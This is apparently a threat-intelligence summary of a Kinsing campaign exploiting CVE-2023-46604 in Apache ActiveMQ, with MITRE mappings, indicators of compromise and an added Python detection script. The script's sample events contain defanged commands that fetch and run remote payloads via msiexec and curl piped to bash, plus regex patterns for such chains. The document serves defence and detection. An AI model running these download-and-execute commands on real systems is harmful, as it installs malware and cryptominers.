A Kinsing (H2Miner) campaign is actively exploiting CVE-2023-46604 in exposed Apache ActiveMQ servers to deploy downloaders and multiple post-exploitation tools targeting both Linux and Windows, including XMRig, Stager, Sharpire, Cobalt Strike, and Meterpreter. The attacks use manipulated OpenWire serialized payloads to load malicious XML config files that install MSI and executable downloaders from infrastructure such as gloryweb.vip. #Kinsing #CVE-2023-46604 #Sharpire #gloryweb.vip
Keypoints
- Kinsing (H2Miner) is exploiting ActiveMQ CVE-2023-46604 to remotely load attacker-supplied XML configuration files and execute commands on vulnerable servers.
- Attackers installed MSI and mm13.exe downloaders (Stager) that fetch in-memory payloads such as Cobalt Strike and Metasploit Meterpreter.
- Campaign targets both Linux and Windows; Linux deployments include scripts that modify XMRig configs to add the actor’s wallet for cryptomining.
- Sharpire, a .NET backdoor that supports PowerShell Empire, was observed alongside Cobalt Strike, Meterpreter, and XMRig for remote control and post-exploitation.
- Exploitation vector involves manipulating the serialized class type in OpenWire to have the server load a remote class XML configuration file.
- IOC infrastructure includes the domain gloryweb.vip and multiple URLs hosting config, scripts, and MSI payloads; several MD5 hashes of observed files were reported.
- Recommendation: patch or mitigate exposed Apache ActiveMQ instances to prevent remote code execution and subsequent malware deployment.
MITRE Techniques
- [T1210] Exploitation of Remote Services – Exploited CVE-2023-46604 in Apache ActiveMQ by “manipulating the serialized class type that instructs the OpenWire protocol to instantiate a class in the classpath” and sending a crafted packet to load a remote XML config.
- [T1041] Exfiltration Over C2 Channel – Use of Cobalt Strike and Meterpreter for remote control and potential data exfiltration: “…responsible for downloading and executing CobaltStrike or Metasploit’s Meterpreter in the memory.”
- [T1496] Resource Hijacking – Deployment of XMRig and modification of its configuration to include the actor’s wallet to mine cryptocurrency: “adds the Kinsing threat actor’s wallet address to the XMRig configuration file.”
- [T1218] Signed Binary Proxy Execution (Msiexec) – Use of msiexec via attacker-supplied XML to install MSI-based downloader: “responsible for using the msiexec command to install MSI malware from an external source.”
- [T1078] Valid Accounts – Leveraging SSH credentials harvested from infected systems for lateral movement: “they also leverage SSH credentials stored in infected systems during the lateral movement process.”
- [T1059] Command and Scripting Interpreter – Use of Bash and PowerShell scripts for payload delivery and Sharpire supporting PowerShell Empire to execute commands: “Sharpire is a .NET-developed backdoor that supports Powershell Empire” and use of a Bash script to modify XMRig.
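A detection example added here (not part of the ASEC report or this summary): Python that runs three rules over constructed process-creation events for the chain described above, the ActiveMQ JVM spawning msiexec or a shell, msiexec installing straight from a URL, and curl/wget piped into bash. The pipe-separated event layout, rule names and sample events are assumptions; the defanged URLs are the ones from the IOC list.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (not from the ASEC report), one per
# line: parent_image|image|command_line. URLs are kept defanged as in the IOC list.
SAMPLE_EVENTS = """\
java.exe|msiexec.exe|msiexec /q /i http://gloryweb[.]vip/mm46[.]msi
java|bash|bash -c "curl -fsSL http://gloryweb[.]vip/lin/go[.]sh | bash"
explorer.exe|msiexec.exe|msiexec /i C:\\Users\\admin\\Downloads\\setup.msi
java.exe|cmd.exe|cmd /c echo hello
services.exe|svchost.exe|svchost -k netsvcs
"""

# Children a Java broker process has no business spawning.
INTERPRETERS = {"msiexec.exe", "cmd.exe", "powershell.exe", "bash", "sh"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", re.IGNORECASE)


@dataclass(frozen=True)
class Alert:
    rule: str
    image: str
    command_line: str


def analyse_event(parent: str, image: str, cmdline: str) -> list[Alert]:
    """Return the detection rules that fire for one process-creation event."""
    alerts, img, args = [], image.lower(), cmdline.lower().split()
    # Rule 1: the ActiveMQ JVM spawning a shell or installer is the step where the
    # attacker-supplied XML config hands off to msiexec / bash.
    if parent.lower().startswith("java") and img in INTERPRETERS:
        alerts.append(Alert("java_spawns_interpreter", image, cmdline))
    # Rule 2: msiexec installing a package from a remote URL (T1218, Msiexec).
    if img == "msiexec.exe" and "/i" in args and REMOTE_URL.search(cmdline):
        alerts.append(Alert("msiexec_remote_install", image, cmdline))
    # Rule 3: curl/wget piped into a shell, the Linux downloader pattern (T1059).
    if img in {"bash", "sh"} and DOWNLOAD_EXEC.search(cmdline):
        alerts.append(Alert("shell_download_and_execute", image, cmdline))
    return alerts


def scan(events: str = SAMPLE_EVENTS) -> list[Alert]:
    """Parse pipe-separated events (maxsplit keeps pipes inside the command line)."""
    found = []
    for line in filter(str.strip, events.splitlines()):
        parent, image, cmdline = line.split("|", 2)
        found.extend(analyse_event(parent, image, cmdline))
    return found


if __name__ == "__main__":
    for a in scan():
        print(f"[{a.rule}] {a.image}: {a.command_line}")
```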
Indicators of Compromise
- [MD5] observed downloader and payload file hashes – 28fb07cf6dcd072c3d0b82c60ce30bef, 72a37a2fa588e013eafd695b8b5b0e61, and 3 more hashes.
- [URL] malicious hosting and payload distribution – http://gloryweb[.]vip/mm46[.]msi, http://gloryweb[.]vip/lin/go[.]sh (downloaders and scripts).
- [FQDN] attacker-controlled domain used for config and payloads – gloryweb[.]vip (serves config.json, scripts, MSI, and ports such as :2086).
- [File Name] downloader filenames observed on infected hosts – mm13.exe, mm46.msi (downloaders/Stagers used to retrieve Cobalt Strike / Meterpreter payloads).
Read more: https://asec.ahnlab.com/en/90811/